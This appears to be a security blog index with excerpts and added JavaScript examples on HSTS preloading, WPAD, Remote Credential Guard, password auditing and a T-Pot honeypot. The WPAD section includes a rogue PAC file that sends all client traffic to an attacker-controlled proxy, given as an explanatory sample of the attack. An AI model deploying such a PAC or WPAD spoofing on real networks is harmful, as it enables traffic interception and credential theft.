HSTS and Preloading

HSTS directs the browser to use HTTPS for certain domains (optionally including their subdomains). This mitigates some MitM attacks by upgrading HTTP connections to HTTPS before any request is sent.

HSTS Preloading

The native implementation of HSTS communicates the policy to the browser via an HTTP response header: Strict-Transport-Security: max-age=31536000; includeSubDomains. HSTS therefore requires the user to have visited the site over HTTPS at least once before the policy is cached. But what if plain HTTP is used on that first visit, or the user clears their cache frequently? An attacker on the path can still redirect the user to a malicious site by altering the response. ...

24 June, 2022 · 2 min · 272 words · JD
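To make the first-visit gap concrete, here is an added example (not code from the original post) that models how a browser parses the Strict-Transport-Security header, decides whether to upgrade a request, and whether a header meets the preload submission requirements. The host names, header values and the tiny preload list are constructed sample inputs; the class and function names are mine.

```javascript
// Added example (not from the original post): a miniature model of how a browser
// parses Strict-Transport-Security and decides whether to upgrade a request.
// Host names and header values below are constructed sample inputs.

// Parse one Strict-Transport-Security header value (RFC 6797 section 6.1).
// Returns maxAge === null when the header is invalid and must be ignored.
function parseHsts(headerValue) {
  const policy = { maxAge: null, includeSubDomains: false, preload: false };
  for (const rawDirective of headerValue.split(';')) {
    const directive = rawDirective.trim();
    if (!directive) continue;
    const eq = directive.indexOf('=');
    const name = (eq === -1 ? directive : directive.slice(0, eq)).trim().toLowerCase();
    // Values may be quoted (max-age="31536000"); strip one pair of quotes.
    const value = eq === -1 ? '' : directive.slice(eq + 1).trim().replace(/^"(.*)"$/, '$1');
    if (name === 'max-age') {
      if (/^\d+$/.test(value)) policy.maxAge = Number(value);
    } else if (name === 'includesubdomains') {
      policy.includeSubDomains = true;
    } else if (name === 'preload') {
      policy.preload = true;
    }
    // Unknown directives are ignored, as the RFC requires.
  }
  return policy;
}

// Header-level requirements for submitting a domain to hstspreload.org:
// max-age of at least one year, includeSubDomains, and the preload token.
const ONE_YEAR = 31536000;
function isPreloadEligible(policy) {
  return policy.maxAge !== null && policy.maxAge >= ONE_YEAR
    && policy.includeSubDomains && policy.preload;
}

// A browser's HSTS store: learned policies plus the built-in preload list.
class HstsCache {
  constructor(preloadList = []) {
    this.entries = new Map(); // host -> { expires (ms), includeSubDomains, preloaded }
    for (const host of preloadList) {
      this.entries.set(host, { expires: Infinity, includeSubDomains: true, preloaded: true });
    }
  }

  // Called for every response. Only HTTPS responses may set policy; a header
  // arriving over plain HTTP is ignored, otherwise an on-path attacker could
  // plant or clear a policy. Returns true if the store was updated.
  record(host, headerValue, overHttps, now) {
    if (!overHttps) return false;
    const policy = parseHsts(headerValue);
    if (policy.maxAge === null) return false;
    const existing = this.entries.get(host);
    if (existing && existing.preloaded) return false; // preload entries are immutable
    if (policy.maxAge === 0) { this.entries.delete(host); return true; }
    this.entries.set(host, {
      expires: now + policy.maxAge * 1000,
      includeSubDomains: policy.includeSubDomains,
      preloaded: false,
    });
    return true;
  }

  // Should http://host/... be rewritten to https before any request is sent?
  // Walks host, then each parent domain; a parent only counts with includeSubDomains.
  shouldUpgrade(host, now) {
    const labels = host.split('.');
    for (let i = 0; i < labels.length; i++) {
      const candidate = labels.slice(i).join('.');
      const entry = this.entries.get(candidate);
      if (!entry) continue;
      if (entry.expires <= now) { this.entries.delete(candidate); continue; }
      if (i === 0 || entry.includeSubDomains) return true;
    }
    return false;
  }
}

// Walk through the first-visit gap the post describes.
const cache = new HstsCache(['preloaded.test']);
const t0 = Date.now();
console.log('first visit, nothing cached:', cache.shouldUpgrade('example.test', t0));       // false
cache.record('example.test', 'max-age=31536000; includeSubDomains', true, t0);
console.log('after one HTTPS visit:', cache.shouldUpgrade('www.example.test', t0 + 1000)); // true
console.log('preloaded, never visited:', cache.shouldUpgrade('any.preloaded.test', t0));   // true
```

The model shows the three states that matter: before the first HTTPS visit nothing is upgraded, a header seen over plain HTTP is discarded rather than trusted, and a preloaded domain is upgraded without ever having been visited. It also shows why submission requires includeSubDomains: without it, a policy learned for example.test does nothing for www.example.test.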

WPAD Security Considerations

What is WPAD?

WPAD stands for Web Proxy Auto-Discovery. It is a protocol by which a client obtains the URL of a PAC file. WPAD tries the following methods, in order, to discover the PAC file URL:

DHCP
DNS
WINS
LLMNR
NetBIOS
Hosts
Lmhosts

The PAC file tells the host where to direct network traffic; it is usually used to force traffic through a web proxy.

Why is it insecure?

When DHCP and DNS are misconfigured, or simply do not answer for "wpad", the client falls back to name-resolution methods such as LLMNR and NetBIOS that any host on the local segment can answer. An attacker who answers that query can provide the client with a PAC file that directs its traffic to a server the attacker controls. ...

20 March, 2022 · 1 min · 203 words · JD
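Because a PAC file is JavaScript that the client executes, whoever wins the "wpad" lookup decides the routing. The following added example (not code from the original post) evaluates PAC files the way a client does: a legitimate corporate PAC next to the kind of PAC an untrusted responder could serve. The helper functions are cut-down versions of the ones browsers expose to PAC scripts; the PAC sources, host names, domain names and proxy addresses are constructed.

```javascript
// Added example (not from the original post): how a client evaluates a PAC file,
// and why whoever answers the "wpad" lookup controls where traffic goes.
// The PAC sources, host names and proxy addresses below are constructed.

// Minimal versions of the helper functions browsers expose to PAC scripts.
const pacHelpers = {
  isPlainHostName: (host) => !host.includes('.'),
  dnsDomainIs: (host, domain) =>
    host.length >= domain.length && host.slice(-domain.length) === domain,
  shExpMatch: (str, pattern) => {
    const re = pattern.split('*')
      .map((s) => s.replace(/[.+?^${}()|[\]\\]/g, '\\$&'))
      .join('.*');
    return new RegExp('^' + re + '$').test(str);
  },
};

// A PAC file is JavaScript that the client executes. This loader does what the
// browser does: run the script and keep its FindProxyForURL function. Note that
// this is exactly why an unauthenticated source for the PAC is a problem.
function loadPac(pacSource) {
  const names = Object.keys(pacHelpers);
  const factory = new Function(...names, `${pacSource}\nreturn FindProxyForURL;`);
  return factory(...names.map((n) => pacHelpers[n]));
}

// The first hop the client will try for a URL: a "PROXY host:port" or "DIRECT".
function firstHop(findProxyForURL, url) {
  const host = new URL(url).hostname;
  return findProxyForURL(url, host).split(';')[0].trim();
}

// The PAC an administrator intends clients to fetch from http://wpad/wpad.dat:
// internal names go direct, everything else through the corporate proxy.
const corporatePac = `
function FindProxyForURL(url, host) {
  if (isPlainHostName(host) || dnsDomainIs(host, ".corp.example")) return "DIRECT";
  if (shExpMatch(host, "10.*")) return "DIRECT";
  return "PROXY proxy.corp.example:8080; DIRECT";
}`;

// What a client receives if an attacker on the segment answers the wpad name
// query instead: every request is sent through a host the attacker controls.
const roguePac = `
function FindProxyForURL(url, host) {
  return "PROXY 198.51.100.23:8080";
}`;

const corporate = loadPac(corporatePac);
const rogue = loadPac(roguePac);
console.log(firstHop(corporate, 'http://wiki.corp.example/'));   // DIRECT
console.log(firstHop(corporate, 'https://bank.example/login'));  // PROXY proxy.corp.example:8080
console.log(firstHop(rogue, 'http://wiki.corp.example/'));       // PROXY 198.51.100.23:8080
```

The client has no way to tell the two scripts apart: both are valid PAC files fetched from "wpad", and the second one quietly turns every request, including those to internal hosts, into a connection to the attacker's proxy.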

Remote Credential Guard

Summary

Remote Credential Guard (RCG) protects administrative credentials by ensuring they are never sent over the network to the target device. RCG is particularly useful for administrators who remotely access and manage servers and other critical systems. By keeping credentials off the remote host during these sessions, it significantly reduces the risk of credential theft and lateral movement within the network.

Details

Clients with RCG enabled do not send their primary credentials to the target machine; Kerberos requests made on the target are redirected back to the client, which holds the credentials. This mitigates the risk of credential theft if the target is compromised. ...

19 March, 2022 · 3 min · 505 words · JD

AD Password Audit

Problem Statement

Accounts with bad passwords, especially accounts with privileged access, are the Achilles' heel of an organisation's security. Traditionally IT has tried to impose "strong password policies" such as "choose a password with an uppercase letter, a number, a symbol and more than 10 characters". However, a password like "Summer2020!" satisfies ALL of those requirements despite being an immeasurably weak password: it is a predictable pattern (a season, a year and a trailing symbol) that any attacker's wordlist covers. So what can we as IT professionals do to reduce bad passwords and mitigate their impact? ...

21 January, 2022 · 3 min · 568 words · JD
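To show the gap between a complexity policy and an actual weakness check, here is an added example (not code from the original post). It implements the quoted policy verbatim, then reduces each password to the word it is built on and compares that against a banned list. The banned list and substitution table are small constructed samples, not a real breach corpus, and the function names are mine.

```javascript
// Added example (not from the original post): why a complexity rule passes
// "Summer2020!" and what a pattern-aware check catches instead. The banned
// word list is a small constructed sample, not a real breach list.

// The traditional policy: more than 10 characters, an uppercase letter,
// a digit and a symbol. "Summer2020!" satisfies every clause.
function meetsComplexityPolicy(password) {
  return password.length > 10
    && /[A-Z]/.test(password)
    && /[0-9]/.test(password)
    && /[^A-Za-z0-9]/.test(password);
}

// Words people build "compliant" passwords around. A real audit would use a
// breach corpus plus the organisation's own name and products (constructed list).
const BANNED_BASE_WORDS = new Set([
  'spring', 'summer', 'autumn', 'fall', 'winter',
  'password', 'welcome', 'changeme', 'letmein', 'qwerty', 'contoso',
]);

// Common substitutions users apply to satisfy the "number" and "symbol" clauses.
const SUBSTITUTIONS = {
  '@': 'a', '4': 'a', '3': 'e', '1': 'i', '!': 'i', '0': 'o', '$': 's', '5': 's', '7': 't',
};

// Reduce a password to the dictionary word it is built on: lowercase, drop the
// leading and trailing digits and symbols (years, "!"), then undo substitutions
// inside the word. A substituted first letter ("$ummer") is stripped by the
// leading-character rule, which is a known limitation of this simple reducer.
function baseWord(password) {
  const core = password.toLowerCase().replace(/^[^a-z]+|[^a-z]+$/g, '');
  return core.split('').map((ch) => SUBSTITUTIONS[ch] ?? ch).join('');
}

// Result for one password: does it pass the policy, and is it still predictable?
function audit(password) {
  const base = baseWord(password);
  return {
    compliant: meetsComplexityPolicy(password),
    predictable: BANNED_BASE_WORDS.has(base),
    baseWord: base,
  };
}

for (const pw of ['Summer2020!', 'P@ssw0rd123!', 'Tr0ub4dor&3-violet-kettle']) {
  console.log(pw, audit(pw));
}
```

The first two passwords are fully policy-compliant and still reduce to "summer" and "password"; the third is compliant and does not reduce to anything on the list. The policy check measures character classes, while the audit measures what an attacker would actually guess.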

Creating a Honeypot with T-Pot

Summary

T-Pot (tpotce) is an all-in-one honeypot platform bundling a collection of honeypots and the tools to monitor them.

Requirements

8 GB RAM
128 GB disk space
Unfiltered internet access
An isolated subnet
Promiscuous mode enabled on the VM's network interface, so that fatt, Suricata and p0f see all traffic
Port forwarding or NAT from the internet to the honeypot

Installation

Set-up is simple as the ISO is prebuilt:

Download the latest ISO from the tpotce releases page.
Mount the ISO to a VM and run through the installer.
Select "Standard" as the install option.
The install should take around 30 minutes.

Network Configuration

Isolated Subnet

To prevent attackers from pivoting from the honeypot into your internal network, you need to place it on an isolated subnet. ...

16 January, 2022 · 3 min · 470 words · JD